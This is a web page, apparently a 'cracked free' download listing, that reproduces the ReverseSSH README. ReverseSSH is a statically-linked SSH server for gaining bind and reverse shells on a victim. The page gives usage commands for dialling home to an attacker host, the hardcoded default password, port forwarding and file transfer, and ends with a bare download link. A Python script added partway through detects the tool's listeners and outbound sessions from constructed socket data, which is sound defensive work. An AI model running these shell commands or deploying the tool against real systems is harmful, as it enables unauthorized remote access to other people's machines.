ReverseSSH Cracked Free Binder/Shell
A statically-linked ssh server with a reverse connection feature for simple yet powerful remote access. Most useful during HackTheBox challenges, CTFs or similar.
It has been developed and extensively used during OSCP exam preparation.
Features
Catching a reverse shell with netcat is cool, sure, but who hasn't accidentally closed a reverse shell with a keyboard interrupt due to muscle memory? Besides their fragility, such shells are also often missing convenience features such as fully interactive access, TAB-completion or history.
Instead, you can simply deploy the lightweight (<1.5MB) ssh server reverse-ssh onto the target and use additional conveniences such as file transfer and port forwarding!
ReverseSSH tries to bridge the gap between initial foothold on a target and full local privilege escalation. Its main strengths are the following:
Fully interactive shell access (see the Windows caveats below for old Windows versions)
File transfer via sftp
Local / remote / dynamic port forwarding
Can be used as bind- and reverse-shell
Supports Unix and Windows operating systems
Windows caveats
A fully interactive PowerShell on Windows relies on the Windows Pseudo Console (ConPTY) and thus requires at least Win10 Build 17763. On earlier versions you can still get an interactive reverse shell, but it can't handle virtual terminal codes such as arrow keys or keyboard interrupts. In such cases you have to append the cmd command, i.e. ssh <OPTIONS> <IP> cmd.
You can achieve full interactive shell access on older Windows versions by dropping ssh-shellhost.exe from OpenSSH for Windows into the same directory as reverse-ssh and then using the flag -s ssh-shellhost.exe. This pipes all traffic through ssh-shellhost.exe, which mimics a pty and transforms all virtual terminal codes into a form that Windows can understand.
Requirements
Simply executing the provided binaries only relies on the system requirements of Go itself.
In short:
Linux: kernel version 2.6.23 and higher
Windows: Windows Server 2008R2 and higher or Windows 7 and higher
Compiling additionally requires the following:
golang version 1.15
optionally upx for compression (e.g. apt install upx-ucl)
Usage
Once reverse-ssh is running on the victim, you can connect with any username and the default password letmeinbrudipls, the ssh key or whatever you specified during compilation. After all, it is just an ssh server:
# Fully interactive shell access
$ ssh -p <RPORT> <RHOST>
# Simple command execution
$ ssh -p <RPORT> <RHOST> whoami
# Full-fledged file transfers
$ sftp -P <RPORT> <RHOST>
# Dynamic port forwarding as SOCKS proxy on port 9050
$ ssh -p <RPORT> -D 9050 <RHOST>
Running ReverseSSH as bind shell
# Victim
victim$ ./reverse-ssh
# Attacker (default password: letmeinbrudipls)
attacker$ ssh -p 31337 <RHOST>
Running ReverseSSH as reverse shell
Note: you can compile ReverseSSH with parameters for LHOST and LPORT to ease execution on the target (see below).
# On attacker (get ready to catch the incoming request;
# can be omitted if you already have an ssh daemon running, e.g. OpenSSH)
# NOTE: LPORT of 8888 collides with incoming connections; use the flag `-b 8889` or similar on the victim in that case
attacker$ ./reverse-ssh -v -l -p <LPORT>
# On victim
victim$ ./reverse-ssh -p <LPORT> <LHOST>
# or in case of an ssh daemon listening at port 22 with password authentication for user 'kali'
victim$ ./reverse-ssh -p 22 kali@<LHOST>
# On attacker (default password: letmeinbrudipls)
attacker$ ssh -p 8888 127.0.0.1
# or with ssh config from below
attacker$ ssh target
In the end it's plain ssh, so you could catch the remote port forwarding call coming from the victim's machine with your OpenSSH daemon listening on port 22. Just prepend <USER>@ and provide the password once asked to do so. Dialling home currently is password only, because I didn't feel like baking a private key in there as well yet...
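Both modes above leave host-level traces that are easy to hunt for: in bind mode an extra SSH listener appears that is not served by the system sshd (on 31337 by default, or whatever -b selects), and in reverse mode an outbound SSH session to port 22 is opened by a process that is not a normal ssh client. The following detection script is an added example, not part of the ReverseSSH project. It parses ss -tnp / ss -tlnp style socket output together with banners grabbed per listening port and flags both patterns. All sample data is constructed; the "SSH-2.0-Go" banner is assumed to be what an unmodified server built on Go's x/crypto/ssh identifies itself as, not a documented ReverseSSH property, and the allowlists are assumptions to be tuned to the host's own baseline.

```python
"""Added example (not part of the ReverseSSH project): hunt for an SSH server that
is not the host's own sshd, either as an extra SSH listener (bind mode) or as an
outbound SSH session opened by a non-ssh-client process (reverse mode)."""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Set

# Constructed `ss -tnap`-style sample (not captured from a real host): the
# legitimate sshd on 22, an extra SSH listener on 31337 (the README's default
# bind port), an outbound session to port 22 from a process that is not an ssh
# client (reverse mode dialling home), a legitimate outbound ssh session, and an
# unrelated cups listener.
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      128    0.0.0.0:31337      0.0.0.0:*         users:(("reverse-ssh",pid=4242,fd=3))
ESTAB  0      0      10.0.0.5:49152     203.0.113.7:22    users:(("reverse-ssh",pid=4243,fd=5))
ESTAB  0      0      10.0.0.5:49160     198.51.100.9:22   users:(("ssh",pid=5100,fd=3))
LISTEN 0      128    127.0.0.1:631      0.0.0.0:*         users:(("cupsd",pid=700,fd=7))
"""

# Constructed banners keyed by local port, as a separate probe that reads the
# first line each listener sends would collect them. "SSH-2.0-Go" is assumed to
# be the default identification string of a Go x/crypto/ssh server.
SAMPLE_BANNERS: Dict[int, str] = {
    22: "SSH-2.0-OpenSSH_9.2",
    31337: "SSH-2.0-Go",
    631: "HTTP/1.1 400 Bad Request",
}

# Host baseline (assumption: tune to the environment being monitored).
EXPECTED_SERVERS: Set[str] = {"sshd"}
EXPECTED_CLIENTS: Set[str] = {"ssh", "sftp", "scp", "git", "rsync"}
SSH_PORTS: Set[int] = {22}

# One ss socket line: state, queues, local addr:port, peer addr:port, first process.
LINE_RE = re.compile(
    r"^(?P<state>[A-Z-]+)\s+\d+\s+\d+\s+"
    r"(?P<laddr>\S+):(?P<lport>\d+)\s+"
    r"(?P<raddr>\S+):(?P<rport>\d+|\*)\s+"
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)


@dataclass(frozen=True)
class Finding:
    kind: str   # "unexpected_ssh_listener" or "unexpected_ssh_client"
    proc: str
    pid: int
    detail: str


def is_ssh_banner(banner: Optional[str]) -> bool:
    """RFC 4253 identification strings start with SSH-2.0- (or SSH-1.99-)."""
    return bool(banner) and (banner.startswith("SSH-2.0-") or banner.startswith("SSH-1.99-"))


def parse_ss(text: str) -> Iterable[dict]:
    """Yield one dict per socket line; the header and unparseable lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.groupdict()


def find_suspicious_ssh(ss_text: str, banners: Dict[int, str],
                        expected_servers: Set[str] = EXPECTED_SERVERS,
                        expected_clients: Set[str] = EXPECTED_CLIENTS,
                        ssh_ports: Set[int] = SSH_PORTS) -> List[Finding]:
    findings: List[Finding] = []
    for s in parse_ss(ss_text):
        proc, pid, lport = s["proc"], int(s["pid"]), int(s["lport"])
        if s["state"] == "LISTEN":
            # Bind mode: a listener that speaks SSH (by well-known port or by
            # banner) but is not held by the expected daemon, on any port.
            speaks_ssh = lport in ssh_ports or is_ssh_banner(banners.get(lport))
            if speaks_ssh and proc not in expected_servers:
                findings.append(Finding(
                    "unexpected_ssh_listener", proc, pid,
                    f"listening on {s['laddr']}:{lport} banner={banners.get(lport)!r}"))
        elif s["state"] == "ESTAB" and s["rport"].isdigit() and int(s["rport"]) in ssh_ports:
            # Reverse mode: an outbound SSH session from something that is not a
            # normal ssh client (the dropped server dialling home).
            if proc not in expected_clients:
                findings.append(Finding(
                    "unexpected_ssh_client", proc, pid,
                    f"outbound to {s['raddr']}:{s['rport']}"))
    return findings


if __name__ == "__main__":
    for f in find_suspicious_ssh(SAMPLE_SS_OUTPUT, SAMPLE_BANNERS):
        print(f"{f.kind}: {f.proc} (pid {f.pid}) {f.detail}")
```

On the sample the script reports the 31337 listener and the outbound session from pid 4243 and stays quiet about sshd, the real ssh client and cups. The banner lookup is what makes the listener check robust to a non-default bind port: without banners only listeners on the well-known SSH ports are considered, so pair this with a banner probe of every listening port rather than relying on port numbers alone.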
For even more convenience, add the following to your ~/.ssh/config, copy the ssh private key to ~/.ssh/ and simply call ssh target or sftp target afterwards:
Download Link